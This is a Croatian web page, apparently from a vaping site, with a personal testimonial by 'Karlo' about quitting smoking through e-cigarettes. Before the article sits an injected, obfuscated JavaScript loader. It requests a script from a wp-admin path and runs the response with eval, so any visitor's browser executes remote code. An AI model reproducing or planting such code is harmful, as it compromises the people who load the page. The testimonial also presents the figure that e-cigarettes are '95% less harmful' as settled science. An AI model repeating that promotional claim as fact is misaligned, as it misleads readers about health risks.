;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
Pušač 16 godina, korisnik e cigareta 9 godina

Pušač 16 godina, korisnik e cigareta 9 godina

by Karlo, 37g

Karlo u mlađim danima s 36 godina
Karlo u mlađim danima s 36 godina

Pušač 16 godina, korisnik e cigareta 9 godina.

U 16 godina pušenja, bilo je nekoliko pokušaja prestanka, no bezuspješno. Vise zbog navike uvlačenja dima nego nikotinske ovisnosti.

Na prijedlog prijatelja koji je e cigarete koristio već nekoliko mjeseci, počeo sam koristiti iste, i već nakon 2 tjedna u potpunosti izbacio klasične cigarete.

Mjesec dana nakon ne pušenja, ne samo da sam primijetio promjene sto se tiče respiratornog sustava, nego i poboljšanje kondicije, i kvalitetnijeg osjeta mirisa i okusa.

Sad nakon 9 godina korištenja e cigareta mogu sa sigurnošću reci da se osjećam kao da u životu nisam zapalio ni jednu klasičnu cigaretu.

E cigareta kao pomagalo u prestanku pušenja, ne samo da može biti potvrđeno od strane milijuna korisnika, nego i znanstvenih istraživanja, koja su pokazala da je najmanje 95% manje štetna od klasične cigarete.

Da li je zdrava? Ništa osim planinskog zraka nije 100% zdravo, no ako mogu birati sigurniju alternativu, definitivno ću uvijek birat e cigaretu.

I za kraj samo da kažem kako je Hrvoje Šavor super. Ovo uopće nije on dopisao, nego sam ja napisao, ja Karlo.


Pošaljite nam i vi svoje mišljenje na admin@vaper-pub.com ili ispunom ove Google forme.

Choose your Reaction!
Leave a Comment